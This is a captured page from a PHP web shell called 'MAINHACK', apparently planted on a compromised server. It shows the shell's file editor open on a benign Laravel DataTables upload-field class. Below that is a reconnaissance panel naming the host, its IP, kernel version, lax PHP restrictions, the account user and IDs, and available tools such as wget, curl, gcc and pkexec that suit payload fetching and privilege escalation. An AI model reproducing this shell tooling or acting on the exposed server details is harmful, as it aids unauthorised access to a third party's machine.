[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: File.php
<?php namespace Yajra\DataTables\Html\Editor\Fields; /** * @see https://editor.datatables.net/reference/field/upload * @see https://editor.datatables.net/examples/advanced/upload.html * @see https://editor.datatables.net/examples/advanced/upload-many.html */ class File extends Field { protected string $type = 'upload'; /** * Editor instance variable name. */ protected string $editor = 'editor'; public static function make(array|string $name, string $label = ''): static { $field = parent::make($name, $label); return $field->displayFile()->clearText()->noImageText(); } /** * @return $this */ public function ajax(string $value): static { $this->attributes['ajax'] = $value; return $this; } /** * @return $this */ public function ajaxData(string $value): static { $this->attributes['ajaxData'] = $value; return $this; } /** * @return $this */ public function dragDrop(bool $value = true): static { $this->attributes['dragDrop'] = $value; return $this; } /** * @return $this */ public function dragDropText(string $value): static { $this->attributes['dragDropText'] = $value; return $this; } /** * @return $this */ public function fileReadText(string $value): static { $this->attributes['fileReadText'] = $value; return $this; } /** * @return $this */ public function noFileText(string $value): static { $this->attributes['noFileText'] = $value; return $this; } /** * @return $this */ public function processingText(string $value): static { $this->attributes['processingText'] = $value; return $this; } /** * @return $this */ public function uploadText(string $value): static { $this->attributes['uploadText'] = $value; return $this; } /** * Set editor instance for file upload. * * @return $this */ public function editor(string $editor): static { $this->editor = $editor; return $this; } /** * Display image upon upload. * * @return $this */ public function displayImage(): static { // TODO: Use Laravel filesystem instead of hard coded storage path return $this->display(<<<'SCRIPT' function (file_id) { return file_id ? '<img src="storage/' + file_id + '" alt=""/>' : null; } SCRIPT ); } /** * @return $this */ public function display(string $value): static { $this->attributes['display'] = $value; return $this; } /** * Display the file path. * * @return $this */ public function displayFile(): static { return $this->display('function (file_id) { return file_id; }'); } /** * @return $this */ public function clearText(string $value = 'Clear'): static { $this->attributes['clearText'] = $value; return $this; } /** * @return $this */ public function noImageText(string $value = 'No image'): static { $this->attributes['noImageText'] = $value; return $this; } /** * @return $this */ public function multiple(bool $state = true): static { if ($state) { $this->type('uploadMany'); } return $this; } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.57 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002